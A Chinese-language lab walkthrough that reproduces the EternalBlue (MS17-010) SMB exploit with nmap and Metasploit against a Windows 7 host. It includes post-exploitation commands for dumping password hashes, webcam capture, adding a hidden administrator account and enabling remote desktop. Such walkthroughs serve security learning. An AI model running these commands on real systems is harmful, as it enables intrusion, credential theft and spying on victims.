本示例主要提供学习使用,不得用于违法犯罪
目录
什么是永恒之蓝
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers公布一大批网络攻击工具,其中包含“永恒之蓝”工具,
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒“WannaCry"勒索软件主要借鉴了针对微软Windows系统漏洞的“永恒之蓝”(EternalBlue)进行传播扩散,“永恒之蓝”攻击程序利用的是Windows SMB远程提权漏洞,可以攻击开放了445 端口的 Windows 系统并提升至系统权限,潜入电脑对多种文件类型加密,并弹出勒索框,向用户索要赎金(以比特币支付)用于解密
漏洞描述MS17-010:
Microsoft Windows SMB Server远程代码执行漏洞 Microsoft Server Message Block 1.0 (SMBv1)服务器处 理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。 Microsoft Windows Server 2016、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、 Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等
漏洞复现:
环境:
kali Linux
Windows7
(同一局域网下,可以ping通)
1、信息收集
使用nmap进行信息收集
发现存活主机:192.168.2.248
对192.168.2.248进行操作系统版本检测:
发现192.168.2.248是Microsoft Windows 7|2008|8.1
并且开放445端口,而永恒之蓝正是利用该端口的smb服务,操作系统溢出漏洞
2、进入MSF利用永恒之蓝漏洞模块
打开MSF:msfconsole
搜索漏洞,命令为:search ms17-010
exploit/windows/smb/ms17010eternalblue 是永恒之蓝攻击模块
auxiliary/scanner/smb/smbms17010 是永恒之蓝扫描模块
两者一般配合使用,先扫描是否存在漏洞,在进行攻击
使用auxiliary/scanner/smb/smbms17010模块进行扫描
use auxiliary/scanner/smb/smb_ms17_010
设置目标主机IP
扫描run
出现该情况,说明存在ms17-010漏洞
使用exploit/windows/smb/ms17010eternalblue攻击模块
use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标IP(win7):set rhosts 192.168.2.248
设置攻击者IP(kali):set lhost 192.168.2.166
kali的IP为192.168.2.166
查看设置选项:show options
开始攻击:run (exploit)
攻击成功
3、后渗透阶段
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
hashdump #导出密码的哈希
ps #查看目标主机进程信息
pwd #查看目标主机当前目录
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #打开视频
run getgui -u Client -p 123456 #创建Client用户,密码为123456
net localgroup administrators Client /add #将Client加入到win7的本地用户组中,以获得更大的权限
run getgui -e #开启远程桌面
rdesktop #打开远程桌面*注意,部分命令在不同视图使用(kali终端,meterpreter,以及获取到靶机的shell命令视图下)
通过meterpreter获取屏幕快照:screenshot
查看权限:getuid
进入shell:shell
利用shell拿到的执行权限提权,就可以对靶机Win7进行控制
导出密码的哈希:hashdump
破解xx的密码
进行远程登陆:rdesktop
登录成功
以上是永恒之蓝漏洞利用部分演示,实际中可以做的事情很多,网络场景中可以利用的漏洞很多,网络安全的威胁无处不在